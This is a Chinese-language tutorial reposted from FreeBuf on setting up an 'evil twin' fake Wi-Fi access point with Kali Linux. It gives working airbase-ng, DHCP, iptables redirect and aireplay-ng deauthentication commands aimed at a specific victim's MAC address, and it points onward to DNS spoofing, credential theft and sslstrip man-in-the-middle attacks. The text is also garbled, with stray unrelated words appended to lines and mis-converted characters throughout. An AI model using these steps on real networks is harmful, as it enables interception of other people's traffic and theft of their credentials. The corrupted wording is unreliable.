該實驗先是搭建一個測試環境,而後建立一個假的無線接入點,把網絡鏈接鏈接到假的接入點而且強迫用戶鏈接假的無線點。css
1.無線網卡:無線網卡用於數據包的嗅探和注入。linux
2. Backtrack或者Kali Linux: 攻擊平臺sql
3.無線網絡:確保該無線由用戶使用,而且能控制這個無線接入點。服務器
4.一個目標機器:這個機器能夠是你的物理機或者虛擬機。本次實驗中用到的是Windows 7 虛擬機網絡
啓動虛擬機,選擇kali linux 。點擊」編輯虛擬機設置(Edit virtual machine settings)」,進入到「網絡適配器(Network Adapter)」選項,在網絡鏈接中選擇「橋接(Bridged)」:app
開啓kali 用root帳戶登陸。dom
鏈接筆記本的無線網卡。確保在Removable Devices選項下的無線網卡選項前面有一個藍色的對鉤。若是沒有,須要選擇無線網卡來讓無線網卡從Windows系統中斷開,鏈接到kali linux虛擬機,以下圖所示:tcp
打開終端,輸入以下命令檢查IP地址和網關。ide
在本例中,網關是192.168.0.1測試
先是用如下命令列出全部網卡列表,以下圖:
能夠看到一個名字是wlan5的網卡,就是這個了。
檢查下用戶附近的無線AP是否均可用,用以下命令,截圖以下:
airodump-ng wlan5
這個命令後將會開始捕捉數據包,而且把用戶附近的訪問點列出來,其中BSSID是無線AP的MAC地址,Channel表明頻率。注意PWR列的值,越靠近的路由器這個值越小。
記下AP點的BSSID 和Channel的值。此外,還要記下目標設備的MAC地址。
在這個例子中,BISSID值是5E:F9:6A:29:28:18,Channel的值是2。目標機器的MAC地址是68:5D:43:7D:F7:E9
咱們必須創建一個假的DHCP服務器來提供一個假的AP接入點。在kali中執行如下命令就能夠建立一個DHCP:
apt-get install isc-dhcp-server
創建好後,修改DHCP配置文件,以下:
leafpad /etc/dhcpd.conf
authoraitative;
default-lease-time 600; max-lease-time 7200; subnet 192.168.1.0 netmask 255.255.255.0 { option routers 192.168.1.1; option subnet-mask 255.255.255.0; option domain-name 「Epson_Printer」; option domain-name-servers 192.168.1.1; range 192.168.1.2 192.168.1.40; }
保存並關閉配置文件。
對/etc/dhcpd/dhcpd.conf文件重複上述操做。
打開終端,執行如下命令,建立一個ESSID名和受害者訪問AP類似的AP接入點,例子中咱們用「Epson_Printer」。
airbase-ng –e Epson_Printer -c 2 wlan5
l e 是AP接入點的ESSID(MAC地址)
l c是無線網絡的頻率
l Wlan5是網卡名
如今,名叫「Epson_Printer」的新的AP接入點建立完成。
如今,咱們打開一個新的終端,開始監控這個釣魚AP,執行以下命令:
airodump-ng –bssid 00:C0:CA:70:8F:25 -C 2 wlan 5
檢查第五步的產生的窗口,新建的AP接入點應該是能夠看見的:
如今,咱們必須向網絡提供這個假的無線AP。打開終端,依次輸入以下命令:
· ifconfig at0 192.168.1.1 netmask 255.255.255.0
· ifconfig at0 mtu 1400
· route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.1
· iptables –flush · iptables –table nat –flush · iptables –delete-chain · iptables –table nat –delete-chain · echo 1 > /proc/sys/net/ipv4/ip_forward · iptables -t nat -A PREROUTING -p udp -j DNAT –to 192.168.0.1(gateway) · iptables -P FORWARD ACCEPT · iptables –append FORWARD –in-interface at0 -j ACCEPT · iptables –table nat –append POSTROUTING –out-interface eth0 -j MASQUERADE · iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port 10000 · dhcpd -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhcpd.pid at0 · /etc/init.d/isc-dhcp-server start
咱們能夠等待別人鏈接這個假的無線AP,也能夠用de-authenticate攻擊強行迫使咱們的目標從新鏈接AP,這樣咱們就能伺機抓包。
咱們能夠用如下命令來執行:
aireplay-ng –deauth 0 -a 5E:F9:6A:29:28:18 -c 68:5D:43:7D:F7:E9 wlan5
5E:F9:6A:29:28:18 是無線AP的MAC地址
0 表明進行de-authentication.
-c 是目標機器的MAC地址
wlan5 是網卡
如下截圖中能夠看到,無線網卡正在發送de-authentication數據包給目標無線AP。目標機器就和「Epson_Printer」 鏈接點斷開了,而且開始嘗試從新鏈接,以下圖:
因爲連續發送deauth包,客戶端一直沒法鏈接到原來的無線AP,因而就開始嘗試鏈接其餘最強的無線AP,咱們的假AP信號很強,因而就開始連了。以下圖:
查看airodump-ng命令窗口。能夠在終端中查看到鏈接的設備:
如今,受害者的設備已經鏈接到咱們的假的無線AP中了。從這裏開始,攻擊者能夠施行各類手段,好比說DNS欺騙用戶鏈接一個假的網站,獲取到用戶認證信息,或者用 sslstrip 和ettercap 進行中間人攻擊。
最後:這篇有點基礎,你們湊合看吧。輕噴(づ ̄3 ̄)づ╭❤~
*參考來源:resources.infosecinstitute,FB小編東二門陳冠希編譯,轉載請註明來自FreeBuf黑客與極客(FreeBuf.COM)